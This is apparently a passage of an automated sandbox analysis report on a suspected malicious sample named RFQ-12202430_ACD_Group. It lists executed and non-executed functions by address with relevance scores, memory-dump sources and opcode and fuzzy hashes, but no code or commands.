                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cba1f359baa76eedf727709408b5f0a0266d10dd7f46ae48fe0ff699fe9a4dcf
                                                          • Instruction ID: 357de51073f6df985082b5161d97731187a9c1509955e5fe9f17ebf1e01305e8
                                                          • Opcode Fuzzy Hash: cba1f359baa76eedf727709408b5f0a0266d10dd7f46ae48fe0ff699fe9a4dcf
                                                          • Instruction Fuzzy Hash:

                                                          Non-executed Functions

                                                          Function 064B0040 Relevance: 3.9, Strings: 3, Instructions: 193COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$H$J
                                                          • API String ID: 0-4181457488
                                                          • Opcode ID: d37d10868df0c495451c260d6d40d65189f04daa8cac1be0852520d917696d79
                                                          • Instruction ID: 2aafdd6587b1a4a3f5189f2e63fce478d491a2a317d1bf6f7c6181c4eca9213e
                                                          • Opcode Fuzzy Hash: d37d10868df0c495451c260d6d40d65189f04daa8cac1be0852520d917696d79
                                                          • Instruction Fuzzy Hash: DB91D770D002288FDB69DF6AC984BDEFBB6BF88305F14D1AAD508A7245DB345A81CF51
                                                          Function 016D2722 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1465509854.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: }
                                                          • API String ID: 0-4239843852
                                                          • Opcode ID: 57140ea5af66fa69964def048e39c394a4d23ba37ddd091f5e67a4c86845fbaa
                                                          • Instruction ID: 624069951ac5b495cffe241a136512d36a68a0648c700e23f2c5661d1b1b82d1
                                                          • Opcode Fuzzy Hash: 57140ea5af66fa69964def048e39c394a4d23ba37ddd091f5e67a4c86845fbaa
                                                          • Instruction Fuzzy Hash: 41514CB1D056588BEB28CF6B8D446CAFAF3AFC9300F14C1FA944CA6254DB744AC69F51
                                                          Function 068A0040 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481376957.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_68a0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: l
                                                          • API String ID: 0-2517025534
                                                          • Opcode ID: 9c83bac29edd101871ac76375923aae5315e4b71b2c22e96f56236439ec30fb8
                                                          • Instruction ID: 1435d70e34e565a6f4e1ff1cbfc4aaf4ee162e03c88076d31175b96e93aa7797
                                                          • Opcode Fuzzy Hash: 9c83bac29edd101871ac76375923aae5315e4b71b2c22e96f56236439ec30fb8
                                                          • Instruction Fuzzy Hash: 3831C971D046288BEB68CF6BC84469DBAF6BB88304F14C1EAD81DA7255DB704A85CF51
                                                          Function 064B6148 Relevance: .4, Instructions: 431COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f37dd70cf2ed32ed55959586ee91a46a93a4e5e1a920b27fe8c335d7da614dc5
                                                          • Instruction ID: dbb9d983983ebcd9abcdca2d08146dcb261268472e3dc2089265109338937ab4
                                                          • Opcode Fuzzy Hash: f37dd70cf2ed32ed55959586ee91a46a93a4e5e1a920b27fe8c335d7da614dc5
                                                          • Instruction Fuzzy Hash: 3C12B670E006188FDB58CFAAC9806DDFBF2BF88305F25D16AD458AB219D7349946CF94
                                                          Function 065C5C68 Relevance: .3, Instructions: 332COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f30ac13bf37a8fb5c279c034c229e1ae6d076e1751b06c928f978258c2cbe0c
                                                          • Instruction ID: a549221cf2b4c8fddd862472116bd3d4154c8902e200d5929dd47a8e533cac8c
                                                          • Opcode Fuzzy Hash: 2f30ac13bf37a8fb5c279c034c229e1ae6d076e1751b06c928f978258c2cbe0c
                                                          • Instruction Fuzzy Hash: 66D10974A00605CFDB54CFA9C584AADB7F2BF88321F2585A9E905AB361D735EC81CF90
                                                          Function 065D6488 Relevance: .3, Instructions: 274COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480079740.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54304a225c3759999e5cbb3c7e2647b66b48b1bf527ae785fb1d728bdea6de06
                                                          • Instruction ID: 348c40ff0ee150328264e9b472d06b979b001bcfc3fcc338c17b3dfe6c8716cb
                                                          • Opcode Fuzzy Hash: 54304a225c3759999e5cbb3c7e2647b66b48b1bf527ae785fb1d728bdea6de06
                                                          • Instruction Fuzzy Hash: E1C11574E04218DFDB64CFA9D884B9EBBF2FB89304F508069D419AB295DB746886CF40
                                                          Function 065D6498 Relevance: .3, Instructions: 269COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480079740.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2c193740843d76caac685f3495062a48c947406b521d5f22db83bb669990c7b
                                                          • Instruction ID: fb78031274642da394e0e17fce73f515b9cf0999099449d54760ea70816d6bed
                                                          • Opcode Fuzzy Hash: f2c193740843d76caac685f3495062a48c947406b521d5f22db83bb669990c7b
                                                          • Instruction Fuzzy Hash: 86C10574E04218DFDB64CFA9D884BADBBF2FB89300F508069D419AB295DB746C86CF40
                                                          Function 065C10E9 Relevance: .3, Instructions: 268COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 783b9de0bfb09ed88502800525d50be524739c8377d1cb8ea60b9f9ffa4b65f0
                                                          • Instruction ID: 3d8a3fb3d97ab6f9d1e1b55348383e2dd947205285ffd73cdaaa4205c916627e
                                                          • Opcode Fuzzy Hash: 783b9de0bfb09ed88502800525d50be524739c8377d1cb8ea60b9f9ffa4b65f0
                                                          • Instruction Fuzzy Hash: 72B1F674E04608CFEB64CFAAD880B9DBBF2FB89314F1490A9D509A7256DB785D85CF40
                                                          Function 065C10F8 Relevance: .3, Instructions: 267COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c34a6be654131e920d3bb965a26601a7407bf2262166b06ee1dbdbab8db9297a
                                                          • Instruction ID: 345d31bba6d0796b286c5728bee86311a0e0fab088b7f1f211e5c1fa8aaf7f05
                                                          • Opcode Fuzzy Hash: c34a6be654131e920d3bb965a26601a7407bf2262166b06ee1dbdbab8db9297a
                                                          • Instruction Fuzzy Hash: 73B11774E04618CFEB64CFAAD8807ADBBF2FB89314F109469D409AB256D7785D85CF40
                                                          Function 068BE180 Relevance: .2, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481376957.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_68a0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a50c6d49e76f891c836dc833ac32b57a978b50b941baa8ae1d58e2d5aec2cb57
                                                          • Instruction ID: 6020ec4920e7c024fc60952d6110ed5f86fd928fe6a2ccf585d2c1e56e37c7ea
                                                          • Opcode Fuzzy Hash: a50c6d49e76f891c836dc833ac32b57a978b50b941baa8ae1d58e2d5aec2cb57
                                                          • Instruction Fuzzy Hash: D4910470D04228CFEBA4DF69C888BDDBBB2BF89345F14A0A9D509A7350DB745A85CF41
                                                          Function 065FE710 Relevance: .2, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7bf3021ea635f4c7786770c0899d735bfa8b78c99a22504318fa5b3c591feb6
                                                          • Instruction ID: 747c7a022970dd7207e74d1d2acd84cab5f63873d1bea2965872ef3351672261
                                                          • Opcode Fuzzy Hash: a7bf3021ea635f4c7786770c0899d735bfa8b78c99a22504318fa5b3c591feb6
                                                          • Instruction Fuzzy Hash: 95816734E15218DFDB94CFA8D884BAEBBF2FB49304F109469D109AB261DB385C85CF40
                                                          Function 065FE720 Relevance: .2, Instructions: 209COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 070f0fee595b3c5829b37d376db9839ee28a637c4577ccd4454801f0f252a575
                                                          • Instruction ID: f21e18b8f5b000f1e5bed1c3d92884d55a0056e379c4d9fe8375a33b0a9bbe49
                                                          • Opcode Fuzzy Hash: 070f0fee595b3c5829b37d376db9839ee28a637c4577ccd4454801f0f252a575
                                                          • Instruction Fuzzy Hash: 82814634E25218DFDB94DFA8D8857AEBBF2FB49304F109469D509AB2A1DB385C85CF40
                                                          Function 065FEA36 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69d7fdb88bcb62143f50d79a68c28d193e1353efb5fa770db0246d0793460821
                                                          • Instruction ID: 281166676e6272bd22fab9ecf47c01add78049ac423a8d04c025f552f826fdbd
                                                          • Opcode Fuzzy Hash: 69d7fdb88bcb62143f50d79a68c28d193e1353efb5fa770db0246d0793460821
                                                          • Instruction Fuzzy Hash: A9814634E25218DFDB94CFA9D8857ADBBF2FB49304F109469D109AB261DB389D85CF40
                                                          Function 016D216F Relevance: .2, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1465509854.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 027dfe26d65be9a6a73ec6b22a458728d9b2f397aff2d952e87a573cd062d033
                                                          • Instruction ID: 858d3cd01dafa1de46f329afa62221b31951779c94d3e79a193681f2328d42b6
                                                          • Opcode Fuzzy Hash: 027dfe26d65be9a6a73ec6b22a458728d9b2f397aff2d952e87a573cd062d033
                                                          • Instruction Fuzzy Hash: 47712E70A116499FDB58DF7AE88469ABBF3FFD9204F14C03AC404AB274EF7858458B51
                                                          Function 016D21A0 Relevance: .2, Instructions: 165COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1465509854.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c09f378a69b801c3a87197a3c7383193edfad40307170d9d6cee21aa49674d49
                                                          • Instruction ID: 54f2b6236f306be55dbdcb160886c10427f5f263ea52d739ab0052d07a3815a4
                                                          • Opcode Fuzzy Hash: c09f378a69b801c3a87197a3c7383193edfad40307170d9d6cee21aa49674d49
                                                          • Instruction Fuzzy Hash: 5971EB70A106499FDB58DF7AF88469ABBF3FBD9204F14C139C404AB278EF7818458B51
                                                          Function 064B6100 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97d0510f87d7e57ba0f95e982a2bf97840fa0fa9d4e8bf02d0fc0237ca1ef7e3
                                                          • Instruction ID: 5becf42ab4b6ba35b4c46c377dc5a7a6c35acd1b6b42803ded398a80953bb5a2
                                                          • Opcode Fuzzy Hash: 97d0510f87d7e57ba0f95e982a2bf97840fa0fa9d4e8bf02d0fc0237ca1ef7e3
                                                          • Instruction Fuzzy Hash: 2051AA71E016598BEB18CFABD9406DEFBF3AFC8300F18C07AD818AB264DB3459418B50
                                                          Function 064B6138 Relevance: .1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a544a3b565bea4270180700a9ce5ed4767fbdb783af6eea663024142da87cfc
                                                          • Instruction ID: 7780beb03cd2e6c94ee85817a954efe8a3e3190df8dcb4d126825f0532bcb11d
                                                          • Opcode Fuzzy Hash: 3a544a3b565bea4270180700a9ce5ed4767fbdb783af6eea663024142da87cfc
                                                          • Instruction Fuzzy Hash: A35188B1E016598BEB18CFABD9405DEFBF3AFC8300F18D07AD958AB214DB3459468B54
                                                          Function 016D1C14 Relevance: .1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1465509854.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d968bb65d75646679baa949010c6253d7456e0c1315855791dcdbffd6edb5cdf
                                                          • Instruction ID: 39b2a89f01c8c13ede7eba766bc4383df6e3a00b1685c7c8130bea33593befa2
                                                          • Opcode Fuzzy Hash: d968bb65d75646679baa949010c6253d7456e0c1315855791dcdbffd6edb5cdf
                                                          • Instruction Fuzzy Hash: B941CFB4D00358DFDB14CFA9D984B9EBBF1BB09300F24916AE816AB351D7749886CF85
                                                          Function 064B001E Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adae22535215d9f3c4576332d2761e0ddff2497de7bf9770e56f071f1a7ed090
                                                          • Instruction ID: 7ddcd9f423be20aec0b75b75f7e06550265ef19bc788e32cf929d1711146e0c2
                                                          • Opcode Fuzzy Hash: adae22535215d9f3c4576332d2761e0ddff2497de7bf9770e56f071f1a7ed090
                                                          • Instruction Fuzzy Hash: FA31ED71D056589FE71ECF6BCC1069ABAFBAFC9200F04D1FAD448AA255DB300B818F51
                                                          Function 063B1060 Relevance: .1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478870817.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08968ea00f3048034992ef9f4ffb9120d24de8979459b3868a9e072180efc631
                                                          • Instruction ID: 4389dea522fdc1bf9698557a4272f32bff5370e5130ac13d71574bbb6136b3df
                                                          • Opcode Fuzzy Hash: 08968ea00f3048034992ef9f4ffb9120d24de8979459b3868a9e072180efc631
                                                          • Instruction Fuzzy Hash: EE31A6B1D05618CBEB68CF6BD9587C9FAF7AFC8304F14C1A9C50CA6254DB740A858F90
                                                          Function 063B1050 Relevance: .1, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478870817.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e3a949022c0ef4ffd437305654d4461f7b3d120accb4b675441ef801f9e590d
                                                          • Instruction ID: 7187abdd2b9431b5574324c11013f2d992620cedac660b6c420711860ac07428
                                                          • Opcode Fuzzy Hash: 4e3a949022c0ef4ffd437305654d4461f7b3d120accb4b675441ef801f9e590d
                                                          • Instruction Fuzzy Hash: 8F3184B1D056188BEB68CF6BC95878AFAF7AFC8304F14C1A9C50CA6255DB740A858F50
                                                          Function 068A001E Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481376957.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_68a0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe6a5ae4b933c893171d75495c61f5f7332113629a4213c3ddb87f584fb3b4b1
                                                          • Instruction ID: 647011b629e383132496c0d8834241dd2ed97bca38df07c9072aa93ec20c593d
                                                          • Opcode Fuzzy Hash: fe6a5ae4b933c893171d75495c61f5f7332113629a4213c3ddb87f584fb3b4b1
                                                          • Instruction Fuzzy Hash: 4B312971D056548BEB29CF2B8C542CABBF6BFC9304F04C0FAD858A6216DB700A858F51
                                                          Function 066D0CC1 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 314f008052b46715420d204b7ba1573875d5ac22f9d718065f2806ecdd1c3b7a
                                                          • Instruction ID: 4dad4d3a25f1ae214208e467a2acb8abfa39cdfd433abececa668a286b1b355a
                                                          • Opcode Fuzzy Hash: 314f008052b46715420d204b7ba1573875d5ac22f9d718065f2806ecdd1c3b7a
                                                          • Instruction Fuzzy Hash: E421DCB5C002189FDB14DFA9D980AEEFBF4BB49310F14901AE819B7210C735A905CFA4
                                                          Function 066D0CC8 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ead43803eacbf3f0f21541f132533fc63f616cd76194f037b63436f6266a5b7
                                                          • Instruction ID: 73f4250550c1daddd5651516ec11a0a23543207b83541e074e8a3fefd418be2e
                                                          • Opcode Fuzzy Hash: 1ead43803eacbf3f0f21541f132533fc63f616cd76194f037b63436f6266a5b7
                                                          • Instruction Fuzzy Hash: E921BAB5D002189FDB14CFA9D984AEEFBF4BB49320F14906AE819B7210C735A901CFA4
                                                          Function 065FC8A8 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 11eb04b2d64143f8fac4032a4a9c5bf6c066ba492f6b2910d36cac7b2868173d
                                                          • Instruction ID: d77e8dccd1972dad8a6af8ce571dede5dd021726ef6f074ac442053dd921d316
                                                          • Opcode Fuzzy Hash: 11eb04b2d64143f8fac4032a4a9c5bf6c066ba492f6b2910d36cac7b2868173d
                                                          • Instruction Fuzzy Hash: 4921E2B1E156188BEB58CFABD9403DEBAF6AFC8300F14C46AC509BA264DB7409458F50
                                                          Function 063BCBF0 Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478870817.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abf664109c6527b627b44d1cd85c1ee2dc3d3e2ab4e4f4580455bded1c38abcc
                                                          • Instruction ID: d19b9ead97ba98c847bd68bf2169ddd6c3ed6a4f089bea921861bb453d2721fd
                                                          • Opcode Fuzzy Hash: abf664109c6527b627b44d1cd85c1ee2dc3d3e2ab4e4f4580455bded1c38abcc
                                                          • Instruction Fuzzy Hash: 1D21BD71E056588BEB68CF6BC9046DAFBF7AFC9300F04D0BAC509AB658DB740A458F50

                                                          Executed Functions

                                                          Function 053395A0 Relevance: 2.8, Strings: 1, Instructions: 1502COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3881424435.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5330000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Pz
                                                          • API String ID: 0-1272085680
                                                          • Opcode ID: 4d2e27cb7d842ce7053c4e499e16bda32c09039179a4d69598fc47558be76fa9
                                                          • Instruction ID: 1656ef82301b5e22860224cbbeb77742e1671bdd2314ecbb498c21cbbfeaf229
                                                          • Opcode Fuzzy Hash: 4d2e27cb7d842ce7053c4e499e16bda32c09039179a4d69598fc47558be76fa9
                                                          • Instruction Fuzzy Hash: B5F2C774B241148FC744EF28E5A4FAB73E2BF9D304F5141A9941A9F369DB30AE52CB84
                                                          Function 05339567 Relevance: 2.8, Strings: 1, Instructions: 1500COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3881424435.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5330000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Pz
                                                          • API String ID: 0-1272085680
                                                          • Opcode ID: 3fc2d7f5853dbcd563d6d7ca3e1a0300c1f7b968decafe121f10e951c1024e1e
                                                          • Instruction ID: 6621a8d8bf00293a3c24fd5186ff97b7f3a37194b623c8f011d5092aa5ea14e6
                                                          • Opcode Fuzzy Hash: 3fc2d7f5853dbcd563d6d7ca3e1a0300c1f7b968decafe121f10e951c1024e1e
                                                          • Instruction Fuzzy Hash: 13F2C774B141148FC744EF28E5A4FAB73E2BF9D304F5141AA941A9F369DB30AE52CB84
                                                          Function 053395B0 Relevance: 2.8, Strings: 1, Instructions: 1500COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3881424435.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5330000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Pz
                                                          • API String ID: 0-1272085680
                                                          • Opcode ID: 79eb51b5d3886a1b30ed0f3b5d9e747956cdd4dde6ef6fb1443d9366135af0fe
                                                          • Instruction ID: 50e6208fd1f76b80c1998b4611fc3485714f4e48c342072b92f418ba42b26303
                                                          • Opcode Fuzzy Hash: 79eb51b5d3886a1b30ed0f3b5d9e747956cdd4dde6ef6fb1443d9366135af0fe
                                                          • Instruction Fuzzy Hash: E9F2C774B141148FC744EF28E5A4FAB73E2BF9D304F5141AA941A9F369DB30AE52CB84
                                                          Function 05130A98 Relevance: 2.7, Strings: 1, Instructions: 1496COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879194728.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5130000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4
                                                          • API String ID: 0-4088798008
                                                          • Opcode ID: d1e1d8266b2a1f69b7faf511f6ab8b1e0a07abdef8488a19996b050ba5283f4c
                                                          • Instruction ID: 901cfc6bdc2467bd0670607150049fb3dd0204e06b7903597c11ac063e4e60eb
                                                          • Opcode Fuzzy Hash: d1e1d8266b2a1f69b7faf511f6ab8b1e0a07abdef8488a19996b050ba5283f4c
                                                          • Instruction Fuzzy Hash: 4BE23F35A04218DFDB55DF58D995BAEBBB6FF89300F108095E816AB394DB309D82CF90
                                                          Function 05130F7F Relevance: 1.9, Strings: 1, Instructions: 696COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879194728.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5130000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4
                                                          • API String ID: 0-4088798008
